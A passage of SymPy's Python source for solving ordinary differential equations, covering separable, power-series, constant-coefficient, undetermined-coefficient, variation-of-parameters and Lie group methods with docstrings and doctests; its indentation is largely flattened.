[Eq(f(x), (1 - sqrt(C1*x**2 + 1))/x), Eq(f(x), (sqrt(C1*x**2 + 1) + 1)/x)]
>>> pprint(dsolve(eq, hint='separable_reduced'))
___________ ___________
/ 2 / 2
1 - \/ C1*x + 1 \/ C1*x + 1 + 1
[f(x) = ------------------, f(x) = ------------------]
x x
References
==========
- Joel Moses, "Symbolic Integration - The Stormy Decade", Communications
of the ACM, Volume 14, Number 8, August 1971, pp. 558
"""
    # Arguments are passed in a form consistent with what the
    # ode_separable function expects
x = func.args[0]
f = func.func
y = Dummy('y')
u = match['u'].subs(match['t'], y)
ycoeff = 1/(y*(match['power'] - u))
m1 = {y: 1, x: -1/x, 'coeff': 1}
m2 = {y: ycoeff, x: 1, 'coeff': 1}
r = {'m1': m1, 'm2': m2, 'y': y, 'hint': x**match['power']*f(x)}
return ode_separable(eq, func, order, r)
def ode_1st_power_series(eq, func, order, match):
r"""
    The power series solution is a method which gives the Taylor series expansion
    of the solution of a differential equation.
For a first order differential equation `\frac{dy}{dx} = h(x, y)`, a power
series solution exists at a point `x = x_{0}` if `h(x, y)` is analytic at `x_{0}`.
The solution is given by
.. math:: y(x) = y(x_{0}) + \sum_{n = 1}^{\infty} \frac{F_{n}(x_{0},b)(x - x_{0})^n}{n!},
where `y(x_{0}) = b` is the value of y at the initial value of `x_{0}`.
To compute the values of the `F_{n}(x_{0},b)` the following algorithm is
followed, until the required number of terms are generated.
1. `F_1 = h(x_{0}, b)`
2. `F_{n+1} = \frac{\partial F_{n}}{\partial x} + \frac{\partial F_{n}}{\partial y}F_{1}`
Examples
========
>>> from sympy import Function, pprint, exp
>>> from sympy.solvers.ode.ode import dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> eq = exp(x)*(f(x).diff(x)) - f(x)
>>> pprint(dsolve(eq, hint='1st_power_series'))
3 4 5
C1*x C1*x C1*x / 6\
f(x) = C1 + C1*x - ----- + ----- + ----- + O\x /
6 24 60
References
==========
- Travis W. Walker, Analytic power series technique for solving first-order
      differential equations, pp. 17, 18
"""
x = func.args[0]
y = match['y']
f = func.func
h = -match[match['d']]/match[match['e']]
point = match.get('f0')
value = match.get('f0val')
terms = match.get('terms')
# First term
F = h
if not h:
return Eq(f(x), value)
# Initialization
series = value
if terms > 1:
hc = h.subs({x: point, y: value})
if hc.has(oo) or hc.has(NaN) or hc.has(zoo):
# Derivative does not exist, not analytic
return Eq(f(x), oo)
elif hc:
series += hc*(x - point)
for factcount in range(2, terms):
Fnew = F.diff(x) + F.diff(y)*h
Fnewc = Fnew.subs({x: point, y: value})
# Same logic as above
if Fnewc.has(oo) or Fnewc.has(NaN) or Fnewc.has(-oo) or Fnewc.has(zoo):
return Eq(f(x), oo)
series += Fnewc*((x - point)**factcount)/factorial(factcount)
F = Fnew
series += Order(x**terms)
return Eq(f(x), series)
def ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='sol'):
r"""
Solves an `n`\th order linear homogeneous differential equation with
constant coefficients.
This is an equation of the form
.. math:: a_n f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x)
+ a_0 f(x) = 0\text{.}
These equations can be solved in a general manner, by taking the roots of
the characteristic equation `a_n m^n + a_{n-1} m^{n-1} + \cdots + a_1 m +
    a_0 = 0`. The solution will then be the sum of `C_n x^i e^{r x}` terms,
    one for each root `r` of the characteristic equation, where `C_n` is an
    arbitrary constant and `i` ranges from 0 to the multiplicity of the root
    minus 1 (for example, a root 3 of multiplicity 2 would create the
    terms `C_1 e^{3 x} + C_2 x e^{3 x}`). The exponential is usually expanded
for complex roots using Euler's equation `e^{I x} = \cos(x) + I \sin(x)`.
Complex roots always come in conjugate pairs in polynomials with real
coefficients, so the two roots will be represented (after simplifying the
constants) as `e^{a x} \left(C_1 \cos(b x) + C_2 \sin(b x)\right)`.
If SymPy cannot find exact roots to the characteristic equation, a
    :py:class:`~sympy.polys.rootoftools.ComplexRootOf` instance will be returned
instead.
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(f(x).diff(x, 5) + 10*f(x).diff(x) - 2*f(x), f(x),
... hint='nth_linear_constant_coeff_homogeneous')
... # doctest: +NORMALIZE_WHITESPACE
Eq(f(x), C5*exp(x*CRootOf(_x**5 + 10*_x - 2, 0))
+ (C1*sin(x*im(CRootOf(_x**5 + 10*_x - 2, 1)))
+ C2*cos(x*im(CRootOf(_x**5 + 10*_x - 2, 1))))*exp(x*re(CRootOf(_x**5 + 10*_x - 2, 1)))
+ (C3*sin(x*im(CRootOf(_x**5 + 10*_x - 2, 3)))
+ C4*cos(x*im(CRootOf(_x**5 + 10*_x - 2, 3))))*exp(x*re(CRootOf(_x**5 + 10*_x - 2, 3))))
Note that because this method does not involve integration, there is no
``nth_linear_constant_coeff_homogeneous_Integral`` hint.
The following is for internal use:
- ``returns = 'sol'`` returns the solution to the ODE.
- ``returns = 'list'`` returns a list of linearly independent solutions,
for use with non homogeneous solution methods like variation of
parameters and undetermined coefficients. Note that, though the
solutions should be linearly independent, this function does not
explicitly check that. You can do ``assert simplify(wronskian(sollist))
!= 0`` to check for linear independence. Also, ``assert len(sollist) ==
order`` will need to pass.
- ``returns = 'both'``, return a dictionary ``{'sol': <solution to ODE>,
'list': <list of linearly independent solutions>}``.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 4) + 2*f(x).diff(x, 3) -
... 2*f(x).diff(x, 2) - 6*f(x).diff(x) + 5*f(x), f(x),
... hint='nth_linear_constant_coeff_homogeneous'))
x -2*x
f(x) = (C1 + C2*x)*e + (C3*sin(x) + C4*cos(x))*e
References
==========
- https://en.wikipedia.org/wiki/Linear_differential_equation section:
Nonhomogeneous_equation_with_constant_coefficients
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 211
# indirect doctest
"""
x = func.args[0]
f = func.func
r = match
# First, set up characteristic equation.
chareq, symbol = S.Zero, Dummy('x')
for i in r.keys():
        if isinstance(i, str) or i < 0:
pass
else:
chareq += r[i]*symbol**i
chareq = Poly(chareq, symbol)
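    # For the docstring example f'''' + 2*f''' - 2*f'' - 6*f' + 5*f = 0 the
    # characteristic polynomial is m**4 + 2*m**3 - 2*m**2 - 6*m + 5
    # = (m - 1)**2*(m**2 + 4*m + 5), whose roots 1, 1 and -2 +/- I produce the
    # (C1 + C2*x)*exp(x) + (C3*sin(x) + C4*cos(x))*exp(-2*x) solution shown above.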
    # Can't just call roots because it doesn't return rootof for unsolvable
# polynomials.
chareqroots = roots(chareq, multiple=True)
if len(chareqroots) != order:
chareqroots = [rootof(chareq, k) for k in range(chareq.degree())]
chareq_is_complex = not all([i.is_real for i in chareq.all_coeffs()])
# A generator of constants
constants = list(get_numbered_constants(eq, num=chareq.degree()*2))
# Create a dict root: multiplicity or charroots
charroots = defaultdict(int)
for root in chareqroots:
charroots[root] += 1
# We need to keep track of terms so we can run collect() at the end.
# This is necessary for constantsimp to work properly.
#
# XXX: This global collectterms hack should be removed.
global collectterms
collectterms = []
gensols = []
conjugate_roots = [] # used to prevent double-use of conjugate roots
    # Loop over roots in the order provided by roots/rootof...
    for root in chareqroots:
        # ... but don't repeat multiple roots.
if root not in charroots:
continue
multiplicity = charroots.pop(root)
for i in range(multiplicity):
if chareq_is_complex:
gensols.append(x**i*exp(root*x))
collectterms = [(i, root, 0)] + collectterms
continue
reroot = re(root)
imroot = im(root)
if imroot.has(atan2) and reroot.has(atan2):
# Remove this condition when re and im stop returning
# circular atan2 usages.
gensols.append(x**i*exp(root*x))
collectterms = [(i, root, 0)] + collectterms
else:
if root in conjugate_roots:
collectterms = [(i, reroot, imroot)] + collectterms
continue
if imroot == 0:
gensols.append(x**i*exp(reroot*x))
collectterms = [(i, reroot, 0)] + collectterms
continue
conjugate_roots.append(conjugate(root))
gensols.append(x**i*exp(reroot*x) * sin(abs(imroot) * x))
gensols.append(x**i*exp(reroot*x) * cos( imroot * x))
# This ordering is important
collectterms = [(i, reroot, imroot)] + collectterms
if returns == 'list':
return gensols
    elif returns in ('sol', 'both'):
gsol = Add(*[i*j for (i, j) in zip(constants, gensols)])
if returns == 'sol':
return Eq(f(x), gsol)
else:
return {'sol': Eq(f(x), gsol), 'list': gensols}
else:
raise ValueError('Unknown value for key "returns".')
def ode_nth_linear_constant_coeff_undetermined_coefficients(eq, func, order, match):
r"""
Solves an `n`\th order linear differential equation with constant
coefficients using the method of undetermined coefficients.
This method works on differential equations of the form
.. math:: a_n f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x)
+ a_0 f(x) = P(x)\text{,}
where `P(x)` is a function that has a finite number of linearly
independent derivatives.
    Functions that fit this requirement are finite sums of functions of the form
`a x^i e^{b x} \sin(c x + d)` or `a x^i e^{b x} \cos(c x + d)`, where `i`
is a non-negative integer and `a`, `b`, `c`, and `d` are constants. For
example any polynomial in `x`, functions like `x^2 e^{2 x}`, `x \sin(x)`,
and `e^x \cos(x)` can all be used. Products of `\sin`'s and `\cos`'s have
a finite number of derivatives, because they can be expanded into `\sin(a
x)` and `\cos(b x)` terms. However, SymPy currently cannot do that
expansion, so you will need to manually rewrite the expression in terms of
the above to use this method. So, for example, you will need to manually
convert `\sin^2(x)` into `(1 + \cos(2 x))/2` to properly apply the method
of undetermined coefficients on it.
    This method works by creating a trial function from the expression and all
    of its linearly independent derivatives and substituting them into the
    original ODE. The coefficients of each term then satisfy a system of linear
    equations, which is solved for and substituted, giving the solution.
If any of the trial functions are linearly dependent on the solution to
the homogeneous equation, they are multiplied by sufficient `x` to make
them linearly independent.
Examples
========
>>> from sympy import Function, dsolve, pprint, exp, cos
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 2) + 2*f(x).diff(x) + f(x) -
... 4*exp(-x)*x**2 + cos(2*x), f(x),
... hint='nth_linear_constant_coeff_undetermined_coefficients'))
/ / 3\\
| | x || -x 4*sin(2*x) 3*cos(2*x)
f(x) = |C1 + x*|C2 + --||*e - ---------- + ----------
\ \ 3 // 25 25
References
==========
- https://en.wikipedia.org/wiki/Method_of_undetermined_coefficients
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 221
# indirect doctest
"""
gensol = ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='both')
match.update(gensol)
return _solve_undetermined_coefficients(eq, func, order, match)
def _solve_undetermined_coefficients(eq, func, order, match):
r"""
Helper function for the method of undetermined coefficients.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_nth_linear_constant_coeff_undetermined_coefficients`
docstring for more information on this method.
The parameter ``match`` should be a dictionary that has the following
keys:
``list``
A list of solutions to the homogeneous equation, such as the list
returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='list')``.
``sol``
The general solution, such as the solution returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='sol')``.
``trialset``
The set of trial functions as returned by
``_undetermined_coefficients_match()['trialset']``.
"""
x = func.args[0]
f = func.func
r = match
coeffs = numbered_symbols('a', cls=Dummy)
coefflist = []
gensols = r['list']
gsol = r['sol']
trialset = r['trialset']
if len(gensols) != order:
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply" +
" undetermined coefficients to " + str(eq) +
" (number of terms != order)")
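    # Illustration of the procedure (hypothetical, not tied to any particular
    # call): for f'' + f = x the trialset is {x, 1}, so trialfunc = a0 + a1*x;
    # substituting gives a0 + a1*x = x, hence a1 = 1, a0 = 0, and the particular
    # solution x is added to the homogeneous solution below.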
trialfunc = 0
for i in trialset:
c = next(coeffs)
coefflist.append(c)
trialfunc += c*i
eqs = sub_func_doit(eq, f(x), trialfunc)
coeffsdict = dict(list(zip(trialset, [0]*(len(trialset) + 1))))
eqs = _mexpand(eqs)
for i in Add.make_args(eqs):
s = separatevars(i, dict=True, symbols=[x])
if coeffsdict.get(s[x]):
coeffsdict[s[x]] += s['coeff']
else:
coeffsdict[s[x]] = s['coeff']
coeffvals = solve(list(coeffsdict.values()), coefflist)
if not coeffvals:
raise NotImplementedError(
"Could not solve `%s` using the "
"method of undetermined coefficients "
"(unable to solve for coefficients)." % eq)
psol = trialfunc.subs(coeffvals)
return Eq(f(x), gsol.rhs + psol)
def _undetermined_coefficients_match(expr, x, func=None, eq_homogeneous=S.Zero):
r"""
Returns a trial function match if undetermined coefficients can be applied
to ``expr``, and ``None`` otherwise.
A trial expression can be found for an expression for use with the method
of undetermined coefficients if the expression is an
additive/multiplicative combination of constants, polynomials in `x` (the
independent variable of expr), `\sin(a x + b)`, `\cos(a x + b)`, and
`e^{a x}` terms (in other words, it has a finite number of linearly
independent derivatives).
Note that you may still need to multiply each term returned here by
sufficient `x` to make it linearly independent with the solutions to the
homogeneous equation.
This is intended for internal use by ``undetermined_coefficients`` hints.
SymPy currently has no way to convert `\sin^n(x) \cos^m(y)` into a sum of
only `\sin(a x)` and `\cos(b x)` terms, so these are not implemented. So,
for example, you will need to manually convert `\sin^2(x)` into `[1 +
\cos(2 x)]/2` to properly apply the method of undetermined coefficients on
it.
Examples
========
>>> from sympy import log, exp
>>> from sympy.solvers.ode.ode import _undetermined_coefficients_match
>>> from sympy.abc import x
>>> _undetermined_coefficients_match(9*x*exp(x) + exp(-x), x)
{'test': True, 'trialset': {x*exp(x), exp(-x), exp(x)}}
>>> _undetermined_coefficients_match(log(x), x)
{'test': False}
"""
a = Wild('a', exclude=[x])
b = Wild('b', exclude=[x])
expr = powsimp(expr, combine='exp') # exp(x)*exp(2*x + 1) => exp(3*x + 1)
retdict = {}
def _test_term(expr, x):
r"""
Test if ``expr`` fits the proper form for undetermined coefficients.
"""
if not expr.has(x):
return True
elif expr.is_Add:
return all(_test_term(i, x) for i in expr.args)
elif expr.is_Mul:
if expr.has(sin, cos):
foundtrig = False
# Make sure that there is only one trig function in the args.
# See the docstring.
for i in expr.args:
if i.has(sin, cos):
if foundtrig:
return False
else:
foundtrig = True
return all(_test_term(i, x) for i in expr.args)
elif expr.is_Function:
if expr.func in (sin, cos, exp, sinh, cosh):
if expr.args[0].match(a*x + b):
return True
else:
return False
else:
return False
elif expr.is_Pow and expr.base.is_Symbol and expr.exp.is_Integer and \
expr.exp >= 0:
return True
elif expr.is_Pow and expr.base.is_number:
if expr.exp.match(a*x + b):
return True
else:
return False
elif expr.is_Symbol or expr.is_number:
return True
else:
return False
def _get_trial_set(expr, x, exprs=set([])):
r"""
Returns a set of trial terms for undetermined coefficients.
        The idea behind undetermined coefficients is that the terms of the expression
        repeat themselves after a finite number of differentiations, up to their
        coefficients (the derivatives are linearly dependent on finitely many terms).
        So if we collect these terms, we have the terms of our trial function.
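        For example, starting from ``x*exp(x)`` repeated differentiation only ever
        produces combinations of ``x*exp(x)`` and ``exp(x)``, so the trial set for
        that term is ``{x*exp(x), exp(x)}`` (compare the doctest in the enclosing
        function's docstring).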
"""
def _remove_coefficient(expr, x):
r"""
Returns the expression without a coefficient.
Similar to expr.as_independent(x)[1], except it only works
multiplicatively.
"""
term = S.One
if expr.is_Mul:
for i in expr.args:
if i.has(x):
term *= i
elif expr.has(x):
term = expr
return term
expr = expand_mul(expr)
if expr.is_Add:
for term in expr.args:
if _remove_coefficient(term, x) in exprs:
pass
else:
exprs.add(_remove_coefficient(term, x))
exprs = exprs.union(_get_trial_set(term, x, exprs))
else:
term = _remove_coefficient(expr, x)
tmpset = exprs.union({term})
oldset = set([])
while tmpset != oldset:
# If you get stuck in this loop, then _test_term is probably
# broken
oldset = tmpset.copy()
expr = expr.diff(x)
term = _remove_coefficient(expr, x)
if term.is_Add:
tmpset = tmpset.union(_get_trial_set(term, x, tmpset))
else:
tmpset.add(term)
exprs = tmpset
return exprs
def is_homogeneous_solution(term):
r""" This function checks whether the given trialset contains any root
of homogenous equation"""
return expand(sub_func_doit(eq_homogeneous, func, term)).is_zero
retdict['test'] = _test_term(expr, x)
if retdict['test']:
# Try to generate a list of trial solutions that will have the
# undetermined coefficients. Note that if any of these are not linearly
# independent with any of the solutions to the homogeneous equation,
# then they will need to be multiplied by sufficient x to make them so.
# This function DOES NOT do that (it doesn't even look at the
# homogeneous equation).
temp_set = set([])
for i in Add.make_args(expr):
act = _get_trial_set(i,x)
if eq_homogeneous is not S.Zero:
while any(is_homogeneous_solution(ts) for ts in act):
act = {x*ts for ts in act}
temp_set = temp_set.union(act)
retdict['trialset'] = temp_set
return retdict
def ode_nth_linear_constant_coeff_variation_of_parameters(eq, func, order, match):
r"""
Solves an `n`\th order linear differential equation with constant
coefficients using the method of variation of parameters.
This method works on any differential equations of the form
.. math:: f^{(n)}(x) + a_{n-1} f^{(n-1)}(x) + \cdots + a_1 f'(x) + a_0
f(x) = P(x)\text{.}
This method works by assuming that the particular solution takes the form
    .. math:: \sum_{i=1}^{n} c_i(x) y_i(x)\text{,}
    where `y_i` is the `i`\th solution to the homogeneous equation. The
    coefficients `c_i(x)` are then found using Wronskians and Cramer's rule. The
    particular solution is given by
    .. math:: \sum_{i=1}^n \left( \int \frac{W_i(x)}{W(x)} \,dx
\right) y_i(x) \text{,}
where `W(x)` is the Wronskian of the fundamental system (the system of `n`
linearly independent solutions to the homogeneous equation), and `W_i(x)`
is the Wronskian of the fundamental system with the `i`\th column replaced
with `[0, 0, \cdots, 0, P(x)]`.
This method is general enough to solve any `n`\th order inhomogeneous
linear differential equation with constant coefficients, but sometimes
SymPy cannot simplify the Wronskian well enough to integrate it. If this
method hangs, try using the
``nth_linear_constant_coeff_variation_of_parameters_Integral`` hint and
simplifying the integrals manually. Also, prefer using
``nth_linear_constant_coeff_undetermined_coefficients`` when it
applies, because it doesn't use integration, making it faster and more
reliable.
Warning, using simplify=False with
'nth_linear_constant_coeff_variation_of_parameters' in
:py:meth:`~sympy.solvers.ode.dsolve` may cause it to hang, because it will
not attempt to simplify the Wronskian before integrating. It is
recommended that you only use simplify=False with
'nth_linear_constant_coeff_variation_of_parameters_Integral' for this
method, especially if the solution to the homogeneous equation has
trigonometric functions in it.
Examples
========
>>> from sympy import Function, dsolve, pprint, exp, log
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x, 3) - 3*f(x).diff(x, 2) +
... 3*f(x).diff(x) - f(x) - exp(x)*log(x), f(x),
... hint='nth_linear_constant_coeff_variation_of_parameters'))
/ / / x*log(x) 11*x\\\ x
f(x) = |C1 + x*|C2 + x*|C3 + -------- - ----|||*e
\ \ \ 6 36 ///
References
==========
- https://en.wikipedia.org/wiki/Variation_of_parameters
- http://planetmath.org/VariationOfParameters
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 233
# indirect doctest
"""
gensol = ode_nth_linear_constant_coeff_homogeneous(eq, func, order, match,
returns='both')
match.update(gensol)
return _solve_variation_of_parameters(eq, func, order, match)
def _solve_variation_of_parameters(eq, func, order, match):
r"""
Helper function for the method of variation of parameters and nonhomogeneous euler eq.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_nth_linear_constant_coeff_variation_of_parameters`
docstring for more information on this method.
The parameter ``match`` should be a dictionary that has the following
keys:
``list``
A list of solutions to the homogeneous equation, such as the list
returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='list')``.
``sol``
The general solution, such as the solution returned by
``ode_nth_linear_constant_coeff_homogeneous(returns='sol')``.
"""
x = func.args[0]
f = func.func
r = match
psol = 0
gensols = r['list']
gsol = r['sol']
wr = wronskian(gensols, x)
if r.get('simplify', True):
wr = simplify(wr) # We need much better simplification for
# some ODEs. See issue 4662, for example.
# To reduce commonly occurring sin(x)**2 + cos(x)**2 to 1
wr = trigsimp(wr, deep=True, recursive=True)
if not wr:
# The wronskian will be 0 iff the solutions are not linearly
# independent.
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply " +
"variation of parameters to " + str(eq) + " (Wronskian == 0)")
if len(gensols) != order:
raise NotImplementedError("Cannot find " + str(order) +
" solutions to the homogeneous equation necessary to apply " +
"variation of parameters to " +
str(eq) + " (number of terms != order)")
negoneterm = (-1)**(order)
for i in gensols:
psol += negoneterm*Integral(wronskian([sol for sol in gensols if sol != i], x)*r[-1]/wr, x)*i/r[order]
negoneterm *= -1
if r.get('simplify', True):
psol = simplify(psol)
psol = trigsimp(psol, deep=True)
return Eq(f(x), gsol.rhs + psol)
def ode_separable(eq, func, order, match):
r"""
Solves separable 1st order differential equations.
This is any differential equation that can be written as `P(y)
\tfrac{dy}{dx} = Q(x)`. The solution can then just be found by
rearranging terms and integrating: `\int P(y) \,dy = \int Q(x) \,dx`.
This hint uses :py:meth:`sympy.simplify.simplify.separatevars` as its back
end, so if a separable equation is not caught by this solver, it is most
likely the fault of that function.
:py:meth:`~sympy.simplify.simplify.separatevars` is
smart enough to do most expansion and factoring necessary to convert a
separable equation `F(x, y)` into the proper form `P(x)\cdot{}Q(y)`. The
general solution is::
>>> from sympy import Function, dsolve, Eq, pprint
>>> from sympy.abc import x
>>> a, b, c, d, f = map(Function, ['a', 'b', 'c', 'd', 'f'])
>>> genform = Eq(a(x)*b(f(x))*f(x).diff(x), c(x)*d(f(x)))
>>> pprint(genform)
d
a(x)*b(f(x))*--(f(x)) = c(x)*d(f(x))
dx
>>> pprint(dsolve(genform, f(x), hint='separable_Integral'))
f(x)
/ /
| |
| b(y) | c(x)
| ---- dy = C1 + | ---- dx
| d(y) | a(x)
| |
/ /
Examples
========
>>> from sympy import Function, dsolve, Eq
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(Eq(f(x)*f(x).diff(x) + x, 3*x*f(x)**2), f(x),
... hint='separable', simplify=False))
/ 2 \ 2
log\3*f (x) - 1/ x
---------------- = C1 + --
6 2
References
==========
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 52
# indirect doctest
"""
x = func.args[0]
f = func.func
C1 = get_numbered_constants(eq, num=1)
r = match # {'m1':m1, 'm2':m2, 'y':y}
u = r.get('hint', f(x)) # get u from separable_reduced else get f(x)
return Eq(Integral(r['m2']['coeff']*r['m2'][r['y']]/r['m1'][r['y']],
(r['y'], None, u)), Integral(-r['m1']['coeff']*r['m1'][x]/
r['m2'][x], x) + C1)
def checkinfsol(eq, infinitesimals, func=None, order=None):
r"""
This function is used to check if the given infinitesimals are the
actual infinitesimals of the given first order differential equation.
This method is specific to the Lie Group Solver of ODEs.
As of now, it simply checks, by substituting the infinitesimals in the
partial differential equation.
.. math:: \frac{\partial \eta}{\partial x} + \left(\frac{\partial \eta}{\partial y}
- \frac{\partial \xi}{\partial x}\right)*h
- \frac{\partial \xi}{\partial y}*h^{2}
- \xi\frac{\partial h}{\partial x} - \eta\frac{\partial h}{\partial y} = 0
where `\eta`, and `\xi` are the infinitesimals and `h(x,y) = \frac{dy}{dx}`
The infinitesimals should be given in the form of a list of dicts
``[{xi(x, y): inf, eta(x, y): inf}]``, corresponding to the
output of the function infinitesimals. It returns a list
of values of the form ``[(True/False, sol)]`` where ``sol`` is the value
obtained after substituting the infinitesimals in the PDE. If it
is ``True``, then ``sol`` would be 0.
"""
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
if not func:
eq, func = _preprocess(eq)
variables = func.args
if len(variables) != 1:
raise ValueError("ODE's have only one independent variable")
else:
x = variables[0]
if not order:
order = ode_order(eq, func)
if order != 1:
raise NotImplementedError("Lie groups solver has been implemented "
"only for first order differential equations")
else:
df = func.diff(x)
a = Wild('a', exclude = [df])
b = Wild('b', exclude = [df])
match = collect(expand(eq), df).match(a*df + b)
if match:
h = -simplify(match[b]/match[a])
else:
try:
sol = solve(eq, df)
except NotImplementedError:
raise NotImplementedError("Infinitesimals for the "
"first order ODE could not be found")
else:
h = sol[0] # Find infinitesimals for one solution
y = Dummy('y')
h = h.subs(func, y)
xi = Function('xi')(x, y)
eta = Function('eta')(x, y)
dxi = Function('xi')(x, func)
deta = Function('eta')(x, func)
pde = (eta.diff(x) + (eta.diff(y) - xi.diff(x))*h -
(xi.diff(y))*h**2 - xi*(h.diff(x)) - eta*(h.diff(y)))
soltup = []
for sol in infinitesimals:
tsol = {xi: S(sol[dxi]).subs(func, y),
eta: S(sol[deta]).subs(func, y)}
sol = simplify(pde.subs(tsol).doit())
if sol:
soltup.append((False, sol.subs(y, func)))
else:
soltup.append((True, 0))
return soltup
def _ode_lie_group_try_heuristic(eq, heuristic, func, match, inf):
xi = Function("xi")
eta = Function("eta")
f = func.func
x = func.args[0]
y = match['y']
h = match['h']
tempsol = []
if not inf:
try:
inf = infinitesimals(eq, hint=heuristic, func=func, order=1, match=match)
except ValueError:
return None
for infsim in inf:
xiinf = (infsim[xi(x, func)]).subs(func, y)
etainf = (infsim[eta(x, func)]).subs(func, y)
# This condition creates recursion while using pdsolve.
# Since the first step while solving a PDE of form
# a*(f(x, y).diff(x)) + b*(f(x, y).diff(y)) + c = 0
# is to solve the ODE dy/dx = b/a
if simplify(etainf/xiinf) == h:
continue
rpde = f(x, y).diff(x)*xiinf + f(x, y).diff(y)*etainf
r = pdsolve(rpde, func=f(x, y)).rhs
s = pdsolve(rpde - 1, func=f(x, y)).rhs
newcoord = [_lie_group_remove(coord) for coord in [r, s]]
r = Dummy("r")
s = Dummy("s")
C1 = Symbol("C1")
rcoord = newcoord[0]
scoord = newcoord[-1]
try:
sol = solve([r - rcoord, s - scoord], x, y, dict=True)
if sol == []:
continue
except NotImplementedError:
continue
else:
sol = sol[0]
xsub = sol[x]
ysub = sol[y]
num = simplify(scoord.diff(x) + scoord.diff(y)*h)
denom = simplify(rcoord.diff(x) + rcoord.diff(y)*h)
if num and denom:
diffeq = simplify((num/denom).subs([(x, xsub), (y, ysub)]))
sep = separatevars(diffeq, symbols=[r, s], dict=True)
if sep:
# Trying to separate, r and s coordinates
deq = integrate((1/sep[s]), s) + C1 - integrate(sep['coeff']*sep[r], r)
# Substituting and reverting back to original coordinates
deq = deq.subs([(r, rcoord), (s, scoord)])
try:
sdeq = solve(deq, y)
except NotImplementedError:
tempsol.append(deq)
else:
return [Eq(f(x), sol) for sol in sdeq]
elif denom: # (ds/dr) is zero which means s is constant
return [Eq(f(x), solve(scoord - C1, y)[0])]
elif num: # (dr/ds) is zero which means r is constant
return [Eq(f(x), solve(rcoord - C1, y)[0])]
# If nothing works, return solution as it is, without solving for y
if tempsol:
return [Eq(sol.subs(y, f(x)), 0) for sol in tempsol]
return None
def _ode_lie_group(s, func, order, match):
heuristics = lie_heuristics
inf = {}
f = func.func
x = func.args[0]
df = func.diff(x)
xi = Function("xi")
eta = Function("eta")
xis = match['xi']
etas = match['eta']
y = match.pop('y', None)
if y:
h = -simplify(match[match['d']]/match[match['e']])
y = y
else:
y = Dummy("y")
h = s.subs(func, y)
if xis is not None and etas is not None:
inf = [{xi(x, f(x)): S(xis), eta(x, f(x)): S(etas)}]
if checkinfsol(Eq(df, s), inf, func=f(x), order=1)[0][0]:
heuristics = ["user_defined"] + list(heuristics)
match = {'h': h, 'y': y}
# This is done so that if any heuristic raises a ValueError
# another heuristic can be used.
sol = None
for heuristic in heuristics:
sol = _ode_lie_group_try_heuristic(Eq(df, s), heuristic, func, match, inf)
if sol:
return sol
return sol
def ode_lie_group(eq, func, order, match):
r"""
This hint implements the Lie group method of solving first order differential
equations. The aim is to convert the given differential equation from the
given coordinate system into another coordinate system where it becomes
invariant under the one-parameter Lie group of translations. The converted
ODE can be easily solved by quadrature. It makes use of the
:py:meth:`sympy.solvers.ode.infinitesimals` function which returns the
infinitesimals of the transformation.
The coordinates `r` and `s` can be found by solving the following Partial
Differential Equations.
.. math :: \xi\frac{\partial r}{\partial x} + \eta\frac{\partial r}{\partial y}
= 0
.. math :: \xi\frac{\partial s}{\partial x} + \eta\frac{\partial s}{\partial y}
= 1
The differential equation becomes separable in the new coordinate system
.. math :: \frac{ds}{dr} = \frac{\frac{\partial s}{\partial x} +
h(x, y)\frac{\partial s}{\partial y}}{
\frac{\partial r}{\partial x} + h(x, y)\frac{\partial r}{\partial y}}
After finding the solution by integration, it is then converted back to the original
coordinate system by substituting `r` and `s` in terms of `x` and `y` again.
Examples
========
>>> from sympy import Function, dsolve, exp, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(f(x).diff(x) + 2*x*f(x) - x*exp(-x**2), f(x),
... hint='lie_group'))
/ 2\ 2
| x | -x
f(x) = |C1 + --|*e
\ 2 /
References
==========
- Solving differential equations by Symmetry Groups,
John Starrett, pp. 1 - pp. 14
"""
x = func.args[0]
df = func.diff(x)
try:
eqsol = solve(eq, df)
except NotImplementedError:
eqsol = []
desols = []
for s in eqsol:
sol = _ode_lie_group(s, func, order, match=match)
if sol:
desols.extend(sol)
if desols == []:
raise NotImplementedError("The given ODE " + str(eq) + " cannot be solved by"
+ " the lie group method")
return desols
def _lie_group_remove(coords):
r"""
This function is strictly meant for internal use by the Lie group ODE solving
method. It replaces arbitrary functions returned by pdsolve as follows:
1] If coords is an arbitrary function, then its argument is returned.
2] An arbitrary function in an Add object is replaced by zero.
3] An arbitrary function in a Mul object is replaced by one.
4] If there is no arbitrary function coords is returned unchanged.
Examples
========
>>> from sympy.solvers.ode.ode import _lie_group_remove
>>> from sympy import Function
>>> from sympy.abc import x, y
>>> F = Function("F")
>>> eq = x**2*y
>>> _lie_group_remove(eq)
x**2*y
>>> eq = F(x**2*y)
>>> _lie_group_remove(eq)
x**2*y
>>> eq = x*y**2 + F(x**3)
>>> _lie_group_remove(eq)
x*y**2
>>> eq = (F(x**3) + y)*x**4
>>> _lie_group_remove(eq)
x**4*y
"""
if isinstance(coords, AppliedUndef):
return coords.args[0]
elif coords.is_Add:
